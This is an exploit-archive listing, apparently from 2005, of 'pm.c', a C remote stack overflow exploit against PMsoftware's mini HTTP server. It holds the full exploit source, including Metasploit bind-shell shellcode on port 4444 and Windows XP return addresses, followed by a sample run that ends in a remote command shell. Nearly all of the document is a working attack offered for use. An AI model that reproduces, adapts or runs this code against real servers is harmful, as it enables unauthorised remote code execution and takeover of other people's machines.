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pm.c
Posted Jun 1, 2005
Authored by c0d3r

PMsoftware miniature HTTP server remote stack overflow exploit.

tags | exploit, remote, web, overflow
SHA-256 | 9525ff54f4bce796e7a507b8bf3f2f24b8bf70434b720199a4b7d4e40cca4562

pm.c

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/*   
PMsoftware mini http server remote stack overflow exploit
author : c0d3r "kaveh razavi" c0d3rz_team@yahoo.com c0d3r@ihsteam.com
package : PMsoftware Web Server version 1.0
advisory : https://www.securiteam.com/windowsntfocus/5TP0B2KFGA.html
company address : www.pmx.it
timeline :
17 Feb 2005 : bug found by ERNW Security
18 Apr 2005 : Public Disclosure
18 Apr 2005 : crash exploit released (ERNW Security)
20 Apr 2005 : IHS exploit released , winxpsp1 & winxpsp2 target
compiled with visual c++ 6 : cl pm.c
greetz : IHSTeam members,exploit-dev mates, securiteam , str0ke-milw0rm
ihsteam.com (persian) www.ihssecurity.com (english , just started)
a big F*u to those who were/are/will trading konkoor questions-answers
(c) IHS security 2005
/*
/*
D:\projects>pm.exe 127.0.0.1 80 0

-------- PMSoftware web server remote overflow exploit by c0d3r

[+] building overflow string
[+] attacking host 127.0.0.1
[+] packet size = 680 byte
[+] connected
[+] sending the overflow string
[+] exploit sent successfully try telnet 127.0.0.1 4444

D:\projects>nc -vv 127.0.0.1 4444
DNS fwd/rev mismatch: localhost != kaveh
localhost [127.0.0.1] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\PMSoftware>DONE !
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define NOP 0x90
#define size 680

// 5 byte GET + 241 byte NOP junk + 4 byte containing return address
// + 30 byte NOP + 399 byte shellcode

// using metasploit great shellcode LPORT=4444 Size=399

unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";


unsigned int rc,sock,os,addr ;
struct sockaddr_in tcp;
struct hostent *hp;
WSADATA wsaData;
char buffer[size];
char jmp_esp[5];
unsigned short port;
char GET[] = "\x47\x45\x54\x20\x2F";
char winxpsp1[] = "\xCC\x59\xFB\x77";
char winxpsp2[] = "\xED\x1E\x94\x7C"; // not tested

int main (int argc, char *argv[]){


if(argc < 3) {
printf("\n-------- PMSoftware web server remote overflow exploit by c0d3r\n");
printf("-------- usage : pm.exe host port target\n");
printf("-------- target 1 : windows xp service pack 1 : 0\n");
printf("-------- target 2 : windows xp service pack 1 : 1\n");
printf("-------- eg : pm.exe 127.0.0.1 80 0\n\n");
exit(-1) ;
}
printf("\n-------- PMSoftware web server remote overflow exploit by c0d3r\n\n");
os = (unsigned short)atoi(argv[3]);
switch(os)
{
case 0:
strcat(jmp_esp,winxpsp1);
break;
case 1:
strcat(jmp_esp,winxpsp2); // wasnt checked
break;
default:
printf("\n[-] this target doesnt exist in the list\n\n");

exit(-1);
}

// Creating heart of exploit code
printf("[+] building overflow string");

memset(buffer,NOP,size);
memcpy(buffer,GET,sizeof(GET)-1);
memcpy(buffer+246,jmp_esp,sizeof(jmp_esp)-1);
memcpy(buffer+275,shellcode,sizeof(shellcode)-1);
buffer[size] = 0;

// EO heart of exploit code


if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
printf("[-] WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) ){
printf("[-] unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock){
printf("[-] socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
else
tcp.sin_addr.s_addr = addr;

if (hp)
tcp.sin_family = hp->h_addrtype;
else
tcp.sin_family = AF_INET;
port=atoi(argv[2]);
tcp.sin_port=htons(port);


printf("\n[+] attacking host %s\n" , argv[1]) ;

Sleep(1000);

printf("[+] packet size = %d byte\n" , sizeof(buffer));

rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc==0)
{

Sleep(1000) ;
printf("[+] connected\n") ;
printf("[+] sending the overflow string\n") ;
send(sock,buffer,strlen(buffer),0);
printf("[+] exploit sent successfully try telnet %s 4444\n" , argv[1]);
}

else {
printf("[-] ouch! Server is not listening .... \n");
}
shutdown(sock,1);
closesocket(sock);
}
// EO exploit code

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